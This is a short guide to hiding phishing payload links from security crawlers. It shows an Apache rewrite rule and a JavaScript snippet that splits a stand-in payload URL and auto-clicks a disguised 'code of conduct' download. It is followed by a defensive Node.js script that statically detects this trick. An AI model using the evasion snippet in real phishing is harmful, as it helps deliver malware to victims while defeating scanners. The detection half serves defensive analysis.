Payload Hosting Obfuscation

Assume that an automated product will crawl the website.

To hide the link to a payload, simply use Apache mod_rewrite (RewriteRule) to generate a "corporate" URL with a unique ID:

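RewriteEngine On
# Requests that do not match an existing file or directory...
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
# ...are handed to index.php, keeping the original query string (QSA)
RewriteRule ^(.*)$ index.php [L,QSA]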

https://bad.com/code/1241412......asd123r1/ will actually call https://bad.com/index.php

We can then use JavaScript to generate the final payload link. However, if the HTML on the phishing website looks like this:

<a href="https://bad.com/payload.docm">download the code of conduct</a>

Automated security tools will easily process the HTML and pull the payload to perform further analysis, so, to obfuscate it:

<a id="download" href="#">download the code of conduct</a>
<script>
  document.getElementById("download").onclick = function() {
    document.location = "https://phish" + "y.domain/pay" + "load";
  }
  document.getElementById("download").click();
</script>
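
From the analysis side, the string splitting shown above can be undone statically. The following Node.js script is an added example, not part of the original page: it folds literal-only concatenations assigned to document.location in inline scripts and records whether the page calls click() on its own. The function names and the sample markup are constructed for illustration.

```javascript
// Added example (not from the original page): static triage of inline scripts.
// Function names and SAMPLE are constructed for illustration.

// Pull the bodies of inline <script> elements out of raw HTML.
function inlineScripts(html) {
  const out = [];
  const re = /<script\b[^>]*>([\s\S]*?)<\/script>/gi;
  let m;
  while ((m = re.exec(html)) !== null) out.push(m[1]);
  return out;
}

// Fold an expression made only of string literals joined by "+".
// Returns null for anything else (variables, calls, template strings).
function foldConcat(expr) {
  const lit = /^\s*(?:"((?:[^"\\]|\\.)*)"|'((?:[^'\\]|\\.)*)')\s*/;
  let rest = expr, value = "";
  for (;;) {
    const m = lit.exec(rest);
    if (!m) return null;
    value += m[1] !== undefined ? m[1] : m[2];
    rest = rest.slice(m[0].length);
    if (rest === "") return value;
    if (rest[0] !== "+") return null;
    rest = rest.slice(1);
  }
}

// Report navigation targets assigned from script, whether the URL was split
// across literals, and whether the page clicks an element without user action.
function findScriptedNavigation(html) {
  const findings = [];
  const assign = /(?:document|window)\.location(?:\.href)?\s*=(?!=)\s*([^;\n]+)/g;
  for (const src of inlineScripts(html)) {
    const autoClick = /\.click\s*\(\s*\)/.test(src);
    let m;
    while ((m = assign.exec(src)) !== null) {
      const url = foldConcat(m[1]);
      findings.push({ url, split: url !== null && m[1].includes("+"), autoClick });
    }
  }
  return findings;
}

// Constructed sample mirroring the markup discussed above.
const SAMPLE = '<a id="download" href="#">download the code of conduct</a>' +
  '<script>document.getElementById("download").onclick = function() {' +
  'document.location= "https://phish" + "y.domain/pay" + "load";}' +
  'document.getElementById("download").click();</script>';
console.log(findScriptedNavigation(SAMPLE));
```

A finding with url set to null means the target is built from something other than plain literals and needs dynamic analysis, for example rendering the page in a sandboxed browser.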
